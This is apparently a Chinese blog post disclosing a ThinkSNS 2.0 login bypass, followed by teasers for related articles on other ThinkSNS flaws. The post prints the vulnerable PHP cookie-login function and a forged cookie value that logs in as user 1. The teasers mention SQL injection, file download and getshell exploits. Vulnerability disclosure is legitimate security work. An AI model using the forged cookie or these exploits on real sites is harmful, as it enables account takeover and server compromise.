thinksns2.0 登陆漏洞

最新推荐文章于 2021-03-31 18:51:39 发布
最新推荐文章于 2021-03-31 18:51:39 发布 · 221 阅读 · 0

1、源代码:
	/**
	 * 使用cookie登陆
	 * 
	 * @param string $cookieId
	 * @return boolean
	 */
	public function cookieLoginLocal($cookieId){
		$cookieId = explode( '.', base64_decode($cookieId) );
		if ($cookieId[0] !== 'thinksns') {
			return false;
		}else {
			$userInfo = M('user')->where('uid='.$cookieId[1])->find();
			return $this->loginLocal($userInfo['email']);
		}
	}

2、构造cookie name=TS_LOGGED_USER; content="base64_encode('thinksns.1')";host:localhost;path:/
3、测试成功(本地),测试thinksns在线demo是不成功,应该是有过改动,为什么不在发行版本里修改掉呢?
iteye_19283
关注
渗透thinksns官网
Coisini的博客
06-16 541
(本文涉及的所有漏洞已经被修复!) (由于文章是后来补写的,有些图可能无法抓到。sorry) ThinkSNS(简称TS),开源微博引擎。 一直都在看thinksns的代码,但是由于很彩笔,一直没找到什么实质的漏洞, 某天在90sec上,看到某黑阔发的thinksns注入0day,看了下,是一个插件的注入,注入点:index.php?app=blog& mod=Index&act...
thinkSNS2.0目录结构
08-17
thinkSNS基本目录结构,适用于基础入门
[漏洞]ThinkSNS严重漏洞--将全站崩溃
数据库天地
09-14 217
author: selfimpr blog: http://blog.csdn.net/lgg201 mail: lgg860911@yahoo.com.cn 漏洞描述: 未对需要暴露在web环境下的脚本做目录结构上的规划, 访问特定脚本, 导致全站依赖的缓存系统崩溃, 全站崩溃. 实现方式: 由于造成后果太严重, 实现步骤不细说, 有兴趣的朋友可以根据描述研究. 造成后果请自己负责....
minify php,ThinkSNS public/minify.php 任意文件包含漏洞
weixin_39912580的博客
03-12 424
## 漏洞信息:ThinkSNS开源微博系统,是智士的开源社交平台。采用PHP+MySQL技术平台,微博+应用的产品模式,同时拥有iphone、android客户端、wap、3G版界面。ThinkSNS public/minify.php 存在任意文件包含漏洞,可被利用导致敏感信息泄漏。## 漏洞分析:问题在public/minify.php:```allowed_content_types=ar...
thinksns开源微博系统 V3上传漏洞
收集盒 Book box
04-20 1040
发布时间:2013-04-08  关键词:thinksns 微博 上传漏洞 ThinkSNS是基于互联网web2.0思想开发的老牌开源微博SNS系统,其开发始于2008年,其间经历了从 1.0→1.6→2.02.3→2.5→2.8→V3多个大版本的迭代,目前最新版本为V3。 thinksns v3 漏洞产生文件 attachaction.class.php: pu
【代码审计】ThinkSNS_V4 任意文件下载漏洞分析
12-03 789
  0x00 环境准备 ThinkSNS官网:http://www.thinksns.com 网站源码版本:ThinkSNS V4  更新时间:2017-09-13 程序源码下载:http://www.thinksns.com/experience.html(填写信息后,提交并下载代码) 默认后台:http://127.0.0.1/index.php?app=admin&amp...
ThinkSNS2.0开发完全指南
"ThinkSNS2.0开发手册是一份由智士软件(北京)有限公司提供的详尽指导文档,旨在帮助开发者理解和构建基于ThinkSNS2.0的社区软件。手册涵盖从产品介绍、架构设计到具体开发指南的多个方面,包括命名与编码规范、...
ThinkSNS 2.0:打造多应用微博客社区系统
标题“ThinkSNS2.0”指代的是新一代的社交媒体网络服务系统,属于SNS(社交网络服务)软件,其特点和功能将围绕构建和优化微博客性质的网络社区展开。描述中详细阐述了ThinkSNS 2.0版本的核心特性,涉及了微博系统、...
ThinkSNS 2.0开发全攻略:打造一流社区软件
ThinkSNS2.0开发指南是一份由智士软件(北京)有限公司编写的文档,旨在帮助用户深入了解并进行ThinkSNS这款社区软件的二次开发。这份指南适用于对ThinkSNS2.0有深入理解和开发需求的专业开发者,它详细介绍了产品的...
ThinkSNS2.0开发手册:打造一流社区软件
"ThinkSNS2.0开发手册" ThinkSNS2.0是一款由智士软件(北京)有限公司推出的社区软件,旨在打造一个完整的微博系统,同时具备多种应用平台接入和无限扩展能力。该系统支持WAP,可以提供手机客户端访问,并且允许...
【实战篇】第19篇:ThinkSNS_V4 后台任意文件下载导致Getshell1
08-03
1、第三方网站,新建一个evil.php,作为第三方源文件: 2、登录后台,通过访问构造的url,成功下载第三方源的恶意脚本文件 3、 通过直接访问url,触发
thinksns V3(开源微博系统) getshell 漏洞附利用方法
收集盒 Book box
05-16 1442
wooyun test的重测试是这程序 结果我申请没让我进 听朋友说是这个 我就大概看了下 就发现个getshell 反正众测那么多黑客 肯定到时候有人挖出来 还不如放出来 attachaction.class.php   public function capture(){ error_reporting(0);
Thinksns微博系统注入漏洞即后台拿webshell
收集盒 Book box
09-20 1927
Exp: http://www.site.com/index.php?app=blog&mod=Index&act=show&id=1101 注入点注入字段 表ts_user `uid` int(11) NOT NULL AUTO_INCREMENT, `email` varchar(255) DEFAULT NULL, `password` varchar(255
漏洞与BUG
撸蛇的博客
08-02 2766
  最近浏览“混世魔王”的博客,看到他撰写的一篇博客《当你发现程序有一个漏洞,你和程序员沟通,程序员认为这只是一个BUG。根本不算漏洞,你会怎么处理这个问题?》,有所感触,便转载博文部分内容以作记录,如有侵权等相关问题,可以联系我,同时说明,最近对web攻防方面十分感兴趣,偶然机会浏览到“混世魔王”的博客,十分欣赏作者。 当你发现程序有一个漏洞,你和程序员沟通,程序员认为这只是一个BUG。根本...
社交系统ThinkSNS+从V0.8.7到V0.8.9我们到底修复了多少个bug?
weixin_33757911的博客
09-29 141
2019独角兽企业重金招聘Python工程师标准>>> ...
ThinkSnS v4后台任意文件下载漏洞
weixin_30600503的博客
06-24 553
漏洞文件:/apps/admin/Lib/Action/UpgradeAction.class.php 主要问题还是出现在了180行直接将远程获取到的图片直接保存。 文中可见并没有做任何的对$downUrl进行过滤,$path也是。 所以就顺利的通过file_get_contents远程获取到了文件,然后通过file_put_contents写入到了$path当中。所以你远...
Thinkphp 2.x、3.0-3.1版代码执行漏洞分析复现
qq_34788994的博客
06-07 1958
转载自 文章目录 闲扯 影响版本 原理分析 漏洞复现 闲扯 学习代码执行的审计时,遇到了双引号的一些迷惑,搜资料的时候发现了这个漏洞,顺便分析复现一哈。 影响版本 2.x、3.0-3.1 原理分析 关键代码: $depr = '\/'; $paths = explode($depr,trim($_SERVER['PATH_INFO'],'/')); $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$v
$ac $f php 代码审计,代码审计之ThinkSNS v4.6.0最新版前台getshell
weixin_39637260的博客
03-31 250
前言对于一个后台的至getshell的漏洞点,若需要当作前台来利用,最直接的idea会想到什么?当然是XSS、CSRF了,这已经不是什么新鲜话题或trick了,较早的wordpress 前台XSS之Getshell、最近安全客也有人发过zzzphp1.6前台的Getshell方式使用类似的方法。所以笔者对ThinkSNS审计的后台漏洞分析及其利用同样结合CSRF进行。漏洞类型通用漏洞简介后台升级存...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值